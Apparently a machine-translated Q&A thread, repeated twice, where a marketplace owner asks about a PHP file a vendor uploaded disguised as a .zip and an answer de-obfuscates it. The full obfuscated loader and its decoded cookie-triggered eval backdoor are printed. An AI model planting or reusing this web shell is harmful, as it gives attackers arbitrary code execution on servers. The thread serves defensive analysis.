有没有人见过像这样混淆的代码?这是什么意思?
Has anyone seen code obfuscated like this before? What does it mean?
我拥有一个数字商品市场,供应商上传了这个文件,它是一个 zip 文件,但在 windows 中显示为损坏。当我在 linux 中打开它时,我震惊地发现文件本身是一个 php 文件,有人在其中添加了 .zip 扩展名。
有人见过这样的代码吗?谁能帮我理解它?是恶意的吗?
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
这就是我到目前为止所得到的。
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))
$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}
TL;DR 此代码让人们使用 cookie 在您的服务器上执行任意脚本
代码所做的是使用一堆随机的 base64 字符串创建一个函数,然后立即执行它。
我花了一些时间 de-obfuscate 函数,给出以下内容:
if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
echo '<serati>';
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
echo '</serati>';}
重要的是这一行:
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
让我们把它分成几部分:
join(array_slice($_COOKIE,count($_COOKIE)-3))
这部分将 $_COOKIE 数组中的所有项目连接在一起,从 count($_COOKIE) - 3 开始直到数组末尾(全部成为一个字符串)
preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')
首先,这会在新创建的字符串中搜索模式 "example= ' "(其中 example 可以是任何单词)并将其替换为 Nothing。所以如果字符串有:
test= 'blah'
将替换为 blah'
。
这也将所有空格替换为 +。
eval(base64_decode(..));
这会获取刚刚创建的字符串(大概是 base64 格式的字符串)并将其解码为人类可读的格式。然后它获取该字符串并在服务器上执行它。
基本上,这意味着某人可以在他们的机器上以 base 64 创建一些 cookie,您的服务器会将它们粉碎成一个长字符串,对其进行解码并执行。
我拥有一个数字商品市场,供应商上传了这个文件,它是一个 zip 文件,但在 windows 中显示为损坏。当我在 linux 中打开它时,我震惊地发现文件本身是一个 php 文件,有人在其中添加了 .zip 扩展名。
有人见过这样的代码吗?谁能帮我理解它?是恶意的吗?
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
这就是我到目前为止所得到的。
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))
$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}
TL;DR 此代码让人们使用 cookie 在您的服务器上执行任意脚本
代码所做的是使用一堆随机的 base64 字符串创建一个函数,然后立即执行它。 我花了一些时间 de-obfuscate 函数,给出以下内容:
if($_COOKIE[0] =='ma' && count($_COOKIE)>3){
echo '<serati>';
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
echo '</serati>';}
重要的是这一行:
eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))));
让我们把它分成几部分:
join(array_slice($_COOKIE,count($_COOKIE)-3))
这部分将 $_COOKIE 数组中的所有项目连接在一起,从 count($_COOKIE) - 3 开始直到数组末尾(全部成为一个字符串)
preg_replace(array('/[^\w=\s]'','/\s/'), array('','+')
首先,这会在新创建的字符串中搜索模式 "example= ' "(其中 example 可以是任何单词)并将其替换为 Nothing。所以如果字符串有:
test= 'blah'
将替换为 blah'
。
这也将所有空格替换为 +。
eval(base64_decode(..));
这会获取刚刚创建的字符串(大概是 base64 格式的字符串)并将其解码为人类可读的格式。然后它获取该字符串并在服务器上执行它。
基本上,这意味着某人可以在他们的机器上以 base 64 创建一些 cookie,您的服务器会将它们粉碎成一个长字符串,对其进行解码并执行。